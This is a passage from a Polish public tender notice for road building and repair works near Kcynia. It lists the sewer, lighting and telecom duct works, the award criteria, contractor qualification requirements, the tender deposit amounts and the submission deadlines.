ok.7 m3,<br/>k)	roboty dot. kanalizacji sanitarnej, na które składają się w szczególności:<br/>-	wykonanie kanałów z rur PVC łączonych kielichowo na uszczelkę gumową o śr. zewn. 160 mm – ok. 22 m,<br/>-	wykonanie kanałów z rur PVC łączonych kielichowo na uszczelkę gumową o śr. zewn. 200 mm – ok. 86 m,<br/>-	przewiert sterowany maszyną – ok. 8 m,<br/>-	montaż rur ochronnych o śr. nom. 300 mm – ok. 8 m,<br/>-	montaż studni rewizyjnych z kręgów betonowych o śr. 1000 mm w gotowym wykopie o głębokości 3 m ¬– ok. 1 szt.,<br/>-	montaż studzienek kanalizacyjnych systemowych PEHD o śr. 600 mm – ok. 3 szt.,<br/>-	montaż studzienek kanalizacyjnych systemowych VAWIN o śr. 400 mm z zamknięciem rurą teleskopową – ok. 2 szt.,<br/>-	montaż studzienek kanalizacyjnych systemowych VAWIN o śr. 315 mm z zamknięciem rurą teleskopową – ok. 3 szt.,<br/>-	wykonanie próby szczelności kanałów rurowych o śr. nom. 150 mm – ok. 22 m,<br/>-	wykonanie próby szczelności kanałów rurowych o śr. nom. 200 mm – ok. 86 m,<br/>l)	roboty dot. kanalizacji deszczowej, na które składają się w szczególności:<br/>-	wykonanie kanałów z rur PVC łączonych na wcisk o śr. zewn. 250 mm – ok. 34 m,<br/>-	wykonanie kanałów z rur PVC łączonych kielichowo na uszczelkę gumową o śr. zewn. 200 mm – ok. 69 m,<br/>-	montaż studni rewizyjnych z kręgów betonowych o śr. 1000 mm ¬– ok. 5,000 szt.,<br/>-	montaż wpustów ulicznych ¬– ok. 10 kpl.,<br/>-	wykonanie próby szczelności kanałów rurowych – ok. 102 m,<br/>m)	roboty dot. regulacji elementów infrastruktury kanalizacji sanitarnej, na które składają się w szczególności:<br/>-	regulacja pionowa: zaworów wodociągowych, gazowych i hydrantów – ok. 26 szt.,<br/>-	regulacja pionowa: kratek ściekowych ulicznych – ok. 10 szt.,<br/>-	regulacja pionowa: włazów kanałowych – ok. 12 szt.,<br/>-	regulacja pionowa: studzienki telefoniczne – ok. 5 szt.,<br/>n)	roboty dot. oświetlenia ulicznego, na które składają się w szczególności:<br/>-	wykopanie rowu kablowego o gł. 1,0 m pod kabel oświetleniowy – ok. 4 m,<br/>-	wykopanie rowu kablowego o gł. 0,6 m pod kabel oświetleniowy – ok. 21 m,<br/>-	wykonanie podsypki z piasku 2x10 cm w rowie kablowym – ok.25 m,<br/>-	ułożenie rury ochronnej typu DVK 110 w rowie kablowym – ok. 8 m,<br/>-	ułożenie kabla typu YAKA 4x35 w rowie kablowym z przykryciem folią – ok. 52 m,<br/>-	ułożenie kabla YAKY 4x35 w rowie w rurze ochronnej – ok. 8 m,<br/>-	montaż kompletny 2 słupów oświetleniowych wysokości 7 i 5 metrów, z fundamentem żelbetonowym prefabrykowanym – ok. 2 kpl.,<br/>-	montaż oprawy oświetleniowej drogowej LED – ok. 2 kpl.,<br/>-	montaż mufy kablowej POLI-01/ 4x35 na istniejącym kablu oświetleniowym – ok. 4 kpl.,<br/>-	zasypanie rowów kablowych – ok. 29 m,<br/>-	montaż uziomu taśmowo - szpilkowego dla słupa oświetleniowego – ok. 1 kpl.,<br/>-	wykonanie pomiarów izolacji kabla – ok. 4 kpl.,<br/>-	wykonanie pomiarów ochronnych – ok. 2 kpl.,<br/>-	stały kontakt z podmiotem odpowiedzialnym za wykonanie oświetlenia przejścia dla pieszych (Enea Oświetlenie),<br/>-	koordynacja wykonania – z podmiotem odpowiedzialnym – oświetlenia przejścia dla pieszych poprzez zapewnienie ustawienia, montażu i podłączenia oświetlenia przez ww. podmiot w terminie nie powodującym kolizji z robotami realizowanymi przez Wykonawcę oraz nie generującym opóźnień bądź konieczności rozbiórki wcześniej wykonanych elementów zamówienia podstawowego,<br/>o)	roboty dot. kanału technologicznego, na które składają się w szczególności:<br/>-	wykonanie oraz zasypanie rowu kablowego o gł. 1,2 m i szer. 0,4 m – ok 139 m,<br/>-	budowa kanalizacji kablowej z rur HDPE ¬– kanał technologiczny telekomunikacyjny z rur światłowodowych 3 x HDPE 40/3,7 – ok. 139 m,<br/>-	ułożenie rury osłonowej HDPE 110/6,3 – ok. 139 m,<br/>-	ułożenie prefabrykowanej wiązki mikrorur WRM – ok. 139 m,<br/>-	budowa studni kablowych prefabrykowanych typu SK-1 – ok. 3 kpl.,<br/>p)	roboty dot. kształtowania terenów zielonych, na które składają się w szczególności:<br/>-	humusowanie skarp z obsianiem przy gr. 5 cm – ok. 146 m2,<br/>q)	zapewnienie czasowej organizacji ruchu, a po zakończeniu prac – ustanowienie stałej organizacji ruchu,<br/>r)	wykonanie geodezyjnego pomiaru powykonawczego zrealizowanych obiektów drogowych wraz z potwierdzeniem złożenia operatu w ośrodku dokumentacji geodezyjnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <p class="mb-0">45232411-6 - Roboty budowlane w zakresie rurociągów wody ściekowej</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont drogi w m. Elizewo:<br/>a)	roboty pomiarowe, na które składają się w szczególności:<br/>-	roboty pomiarowe przy liniowych robotach ziemnych na odcinku ok. 1,6 km,<br/>-	geodezyjna inwentaryzacja powykonawcza na odcinku ok. 1,6 km,<br/>b)	roboty rozbiórkowe, na które składają się w szczególności:<br/>-	frezowanie nawierzchni bitumicznej o gr. 4 cm z wywozem materiału z rozbiórki – ok. 45 m2,<br/>-	mechaniczne rozebranie nawierzchni z tłucznia kamiennego o gr. 15 cm – ok. 32 m2,<br/>-	rozebranie przepustów rurowych o śr. 40 cm – ok. 20 m,<br/>-	wywiezienie gruzu z terenu rozbiórki – ok. 9 m3,<br/>-	ręczne ścinanie i karczowanie średniej gęstości krzaków – ok. 0,1 ha,<br/>c)	roboty ziemne, na które składają się w szczególności:<br/>-	roboty ziemne wykonywane koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi – ok. 24 m3,<br/>-	zagęszczenie nasypów ubijakami mechanicznymi – ok. 24 m3,<br/>d)	roboty w zakresie krawężnika betonowego, na które składają się w szczególności:<br/>-	wykonanie ławy pod krawężnik – ok. 2,6 m3,<br/>-	ustawienie krawężników betonowych o wymiarach 12 x 25 – ok. 52 m,<br/>e)	roboty dot. nawierzchni, na które składają się w szczególności:<br/>-	mechaniczne czyszczenie nawierzchni ulepszonej – ok. 8 183 m2,<br/>-	skropienie nawierzchni drogowej asfaltem – ok. 8 183 m2,<br/>-	nawierzchnia z mieszanki mineralno – bitumicznej – warstwa wiążąca, grubość po zagęszczeniu ok. 4 cm ¬– ok. 8 183 m2,<br/>-	skropienie nawierzchni drogowej asfaltem – ok. 8 183 m2,<br/>-	wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości po zagęszczeniu 3 cm – ok. 8 183 m2,<br/>f)	roboty dot. poboczy, na które składają się w szczególności:<br/>-	wykonanie podbudowy z kruszywa łamanego – ok. 30 m2,<br/>-	wykonanie nawierzchni z betonu zbrojonego – ok. 30 m2,<br/>g)	roboty dot. przepustów, na które składają się w szczególności:<br/>-	ułożenie przepustów rurowych pod zjazdami – rura PCV o śr. 40 cm – ok. 24 m,<br/>-	wykonanie ławy fundamentowej żwirowej – ok. 0,96 m3,<br/>-	wykonanie ławy betonowej o gr. 10 cm – ok. 0,1 m3,<br/>-	ułożenie nawierzchni z brukowca z kamienia obrobionego o wym. 16-20 cm – ok. 1 m2,<br/>h)	roboty dot. organizacji ruchu, na które składają się w szczególności:<br/>-	ustawienie słupków do pionowych znaków drogowych – 17 szt.,<br/>-	montaż tablic znaków drogowych – 15 szt.,<br/>-	ręczne malowanie linii na skrzyżowaniach i przejściach dla pieszych – ok. 9 m2,<br/>i)	roboty wykończeniowe, na które składają się w szczególności:<br/>-	mechaniczne profilowanie i zagęszczenie podłoża pod konstrukcje poboczy gruntowych – ok. 2 362 m2,<br/>j)	zapewnienie czasowej organizacji ruchu, a po zakończeniu prac – ustanowienie stałej organizacji ruchu,<br/>k)	wykonanie geodezyjnego pomiaru powykonawczego zrealizowanych obiektów drogowych wraz z potwierdzeniem złożenia operatu w ośrodku dokumentacji geodezyjnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone na podstawie art. 112 ustawy oraz nie mogą podlegać wykluczeniu z postępowania z powodu okoliczności określonych w art. 108 oraz art. 109 ust. 1 1, 4, 5, 7 i 8 ustawy.<br/>2.	Wykonawcy ubiegający się o udzielenie zamówienia muszą:<br/>a)	posiadać zdolność do występowania w obrocie gospodarczym, tj.:<br/>-	być zarejestrowanymi we właściwym rejestrze lub w centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do takiego rejestru lub takiej ewidencji;<br/>b)	posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, tj.:<br/>-	Zamawiający nie stawia w tym zakresie warunku udziału w postępowaniu;<br/>c)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:<br/>-	być ubezpieczonym od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość sumy ubezpieczenia nie mniejszą niż: <br/>w zadaniu nr 1 „Budowa drogi w m. Kazimierzewo (dofinansowywana z Programu „Rządowy Fundusz Polski Ład: Inwestycji Strategicznych”)”: 1 000 000,00 zł / <br/>w zadaniu nr 2 „Przebudowa drogi w m. Rozpętek”: 500 000,00 zł / <br/>w zadaniu nr 3 „Przebudowa ul. Strażackiej w Kcyni”: 400 000,00 zł / <br/>w zadaniu nr 4 „Remont drogi w m. Elizewo”: 300 000,00 zł,<br/>z zastrzeżeniem, że ww. kwoty nie sumują się (jeśli Wykonawca składa ofertę na więcej niż 1 zadanie częściowe, suma ubezpieczenia odpowiedzialności cywilnej winna być nie niższa niż najwyższa spośród wymaganych dla zadań, na które składa swoją ofertę).<br/>d)	posiadać zdolność techniczną lub zawodową, tj.:<br/>-	wykazać należyte (bez wad, opóźnienia i zgodnie z projektem) wykonanie równoważnych zamówień w ilości nie mniejszej niż 2 (dwa) w ciągu ostatnich 5 (pięciu) lat (ilość zamówień należy rozumieć jako liczbę zawartych umów na budowę / rozbudowę / przebudowę / remont dróg), których długość i/lub powierzchnia budowy była zbliżona do określonej w przedmiotowym postępowaniu – za zamówienia równoważne Zamawiający uzna wybudowanie / rozbudowanie / przebudowanie / wyremontowanie dróg kategorii ruchu tożsamej lub wyższej od określonej w Rozdziale II SWZ „Opis Przedmiotu Zamówienia”, tj. KR-1 i klasie technicznej tożsamej lub wyższej, tj. klasy technicznej D oraz o długości i/lub powierzchni równej parametrom określonym w przedmiotowym postępowaniu (z tolerancją 10% tych parametrów) lub wybudowanie / rozbudowanie / przebudowanie / wyremontowanie drogi o długości i/lub powierzchni budowy większej od parametrów drogi stanowiącej przedmiot zamówienia;<br/>-	dysponować nie mniej niż 1 osobą mogącą spełniać obowiązki kierownika budowy, tj. posiadającą uprawnienia budowlane w zakresie wykonywanych prac, która przynajmniej dwukrotnie, przed wszczęciem przedmiotowego postępowania, wykonywała obowiązki kierownika budowy dla inwestycji polegających na budowie / rozbudowie / przebudowie / remoncie drogi o kategorii i klasie technicznej nie niższych niż wskazane w Rozdziale II SWZ „Opis Przedmiotu Zamówienia”; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 1 i ppkt 2 lit. a) SWZ,<br/>2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem podatków lub opłat także dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności – wystawione nie wcześniej niż 3 miesiące przed jego złożeniem – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 1 SWZ,<br/>3)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne także dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności – wystawione nie wcześniej niż 3 miesiące przed jego złożeniem – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 1 SWZ,<br/>4)	oświadczenie o braku przynależności do grupy kapitałowej (Załącznik nr 3) – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 1 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną w pkt. IX ppkt 2 lit. c SWZ – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. c SWZ<br/>2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie (Załącznik nr 3) – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. d SWZ,<br/>Dowodami, o których mowa w lit. b, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>4)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 6) – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. b oraz lit. d SWZ,<br/>5)	oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy (Załącznik nr 7) – w celu potwierdzenia spełnienia wymagania z pkt. IX ppkt 2 lit. d SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	dowód wniesienia wadium – w przypadku wadium niegotówkowego należy złożyć dokument (w szczególności: gwarancję lub poręczenie) potwierdzający przyjęcie przez gwaranta zobowiązania do zapłaty wadium, zgodnie z zapisami pkt. X SWZ,<br/>b)	dokument, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – jeżeli dotyczy,<br/>c)	zobowiązanie podmiotu(ów) udostępniającego(ych) zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny(e) podmiotowy(e) środek(ki) dowodowy(e) potwierdzający(e), że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego(ych) podmiotu(ów) oraz potwierdzające, że stosunek łączący Wykonawcę z podmiotem(ami) udostępniającym(i) zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określające w szczególności:<br/>	zakres dostępnych Wykonawcy zasobów innego podmiotu,<br/>	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą<br/>– jeżeli dotyczy (jeżeli Wykonawca korzysta z udostępnienia zasobów).<br/>d)	wypełniony (i uzupełniony, jeżeli trzeba) formularz kosztorysu ofertowego, stanowiącego załącznik do SWZ, który winien zawierać: Informację o narzutach, Tabelę elementów scalonych, Kalkulację kosztów, Zestawienie poszczególnych pozycji cen Robocizny, Materiałów i Sprzętu – bądź kosztorys ofertowy przygotowany samodzielnie, w oparciu o dokumenty wskazane w Rozdziale III pkt. 8 – 11 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości:<br/>a)	w zadaniu nr 1 „Budowa drogi w m. Kazimierzewo (dofinansowywana z Programu „Rządowy Fundusz Polski Ład: Inwestycji Strategicznych”)”: 30 000,00 zł (słownie: trzydzieści tysięcy złotych)<br/>b)	w zadaniu nr 2 „Przebudowa drogi w m. Rozpętek”: 13 000,00 zł (słownie: trzynaście tysięcy złotych)<br/>c)	w zadaniu nr 3 „Przebudowa ul. Strażackiej w Kcyni”: 12 000,00 zł (słownie: dwanaście tysięcy złotych)<br/>d)	w zadaniu nr 4 „Remont drogi w m. Elizewo”: 9 000,00 zł (słownie: dziewięć tysięcy złotych).<br/>2.	Wadium może być wniesione w:<br/>a)	pieniądzu,<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2020.299 t.j.).<br/>3.	Wadium w pieniądzu winno zostać wniesione przelewem na rachunek bankowy Zamawiającego. O wniesieniu wadium w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego, tj. uznania rachunku Zamawiającego, która musi nastąpić przed terminem składania ofert.<br/>4.	Przelewu należy dokonać na rachunek bankowy podany w pkt I ppkt 2 SWZ.<br/>5.	Na poleceniu przelewu (blankiecie wpłaty) należy podać tytuł przelewu: „Wadium przetargowe – RI.271.1.475887.2022 – zadanie nr …” oraz podać informację o numerze rachunku bankowego Wykonawcy, na które ma zostać dokonany zwrot wadium.<br/>6.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>a)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie,<br/>b)	z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>c)	winno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego,<br/>d)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert).<br/>e)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania (wskazane na 1. stronie SWZ),<br/>f)	jako beneficjent gwarancji / poręczenia winien być wskazany Zamawiający,<br/>g)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy) poręczenie / gwarancja winno/a obejmować swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj. zobowiązanych z tytułu poręczenia / gwarancji), bądź z treści dokumentu winno wynikać, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>7.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium – w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy – zostanie odrzucona.<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegóły dot. rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia znajdują się w §14 projektu umowy stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/475887</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I.	Przyjęte parametry techniczne: kategoria ruchu – KR-1 / klasa techniczna – D.<br/>II.	Dokładny opis przedmiotu zamówienia znajduje się w dokumentach wskazanych w Rozdziale III pkt. 8 – 11 SWZ – Wykonawcy winni przygotować swoje oferty w oparciu o treść wskazanych tam dokumentów! <br/>III.	Wizja lokalna:<br/>Zamawiający informuje, że nie wymaga przeprowadzenia wizji lokalnej lub sprawdzenia dokumentów dotyczących zamówienia jakie znajdują się w dyspozycji Zamawiającego, jako warunku złożenia ważnej oferty.<br/>IV.	Szczegółowy opis materiałów stanowiących dostawę Zamawiającego:<br/>Zamawiający nie przewiduje realizacji zamówienia z wykorzystaniem dostawy inwestorskiej – wszystkie materiały (urządzenia) niezbędne do realizacji zamówienia dostarcza Wykonawca.<br/>V.	Dodatkowe informacje:<br/>1.	Zamawiający, dopuszczając w Rozdziale I pkt V ppkt 7 SWZ, złożenie oferty równoważnej, wskazuje, że warunkiem uznania oferty za równoważną jest uzyskanie, za pomocą rozwiązania równoważnego zaproponowanego przez Wykonawcę w ofercie, rezultatu identycznego z określonym w niniejszym rozdziale i dokumentach dot. przedmiotu zamówienia, wskazanych w Rozdziale III SWZ.<br/>VI.	Wymóg zatrudnienia na podstawie umowy o pracę:<br/>1.	Zamawiający, na podstawie art. 95 ust. 1 ustawy, określa wymaganie zatrudnienia na podstawie umowy o pracę osób wykonujących czynności wskazane w pkt. II (powyżej), jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z 